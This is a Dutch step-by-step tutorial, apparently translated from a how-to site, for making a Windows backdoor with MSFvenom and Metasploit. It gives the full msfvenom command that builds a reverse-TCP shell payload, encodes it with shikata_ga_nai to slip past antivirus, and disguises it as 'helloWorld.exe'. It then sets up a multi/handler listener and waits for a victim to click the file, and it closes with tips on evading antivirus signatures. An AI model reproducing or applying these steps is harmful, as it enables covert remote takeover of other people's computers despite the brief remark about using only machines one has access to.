Een achterdeur wordt gebruikt om beveiligingsmechanismen te omzeilen, vaak in het geheim en meestal niet op te sporen. Met behulp van MSFvenom, de combinatie van msfpayload en msfencode, is het mogelijk om een achterdeur te maken die terug verbinding maakt met de aanvaller met behulp van reverse shell-TCP. Om een achterdeur te ontwikkelen, moet u de handtekening van uw malware wijzigen om antivirussoftware te omzeilen. Voltooi dit project op een paar computers waartoe je toegang hebt, en tijdens het proces leer je meer over computerbeveiliging en hoe dit soort achterdeur werkt.
Stappen
Stap 1. Start Kali op en start de Terminal-console
Stap 2. Typ ifconfig om de interface weer te geven en controleer uw IP-adres
Stap 3. Typ msfvenom -l encoders om de lijst met encoders weer te geven
Je gebruikt x86/shikata_ga_nai als de encoder
Stap 4. Typ "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows geeft de te gebruiken architectuur aan.
- -p windows/shell/reverse_tcp geeft de payloads aan die moeten worden ingesloten.
- LHOST geeft het IP-adres van de luisteraar aan.
- LPORT duidt de luisteraarpoort aan.
- -b "\x00" geeft aan om slechte tekens (null bytes) te voorkomen.
- -e x86/shikata_ga_nai geeft de naam van de encoder aan.
- -f exe > helloWorld.exe geeft formaatuitvoer aan.
Stap 5. Typ msfconsole om Metasploit te activeren
Nu heb je je achterdeur gegenereerd. Wanneer het slachtoffer op helloWorld.exe klikt, wordt de shell-payload die is ingesloten, geactiveerd en maakt een verbinding met uw systeem. Om de verbinding te ontvangen, moet u de multi-handler openen in Metasploit en de payloads instellen
Stap 6. Typ use exploit/multi/handler
Stap 7. Typ set payload windows/shell/reverse_tcp
Stap 8. Typ show options om de module te controleren
Stap 9. Typ set LHOST 192.168.48.129
"LHOST" geeft het IP-adres van de luisteraar aan
Stap 10. Typ set LPORT 4444
"LPORT" geeft de luisteraarpoort aan
Stap 11. Typ run en wacht op de verbinding vanaf de computer van het slachtoffer
Stap 12. Wacht tot het slachtoffer op helloWorld.exe klikt
Dan wordt u succesvol verbonden met de machine van het slachtoffer.
Tips
- Het gebruik van -i in MSFvenom vertegenwoordigt de iteraties van de codering. Soms kunnen meer iteraties helpen om de AV-software te omzeilen.
- Je hebt geleerd hoe je de achterdeur kunt genereren en coderen met MSFvenom, maar deze methode zal tegenwoordig niet perfect werken tegen sommige van de AV-software. De reden hiervoor is vanwege de uitvoeringssjablonen in MSFvenom. De AV-leveranciers hebben de statische handtekening van deze sjablonen toegevoegd en zoeken ze gewoon op. De oplossing voor dit probleem is om een ander uitvoeringssjabloon of andere tools te gebruiken.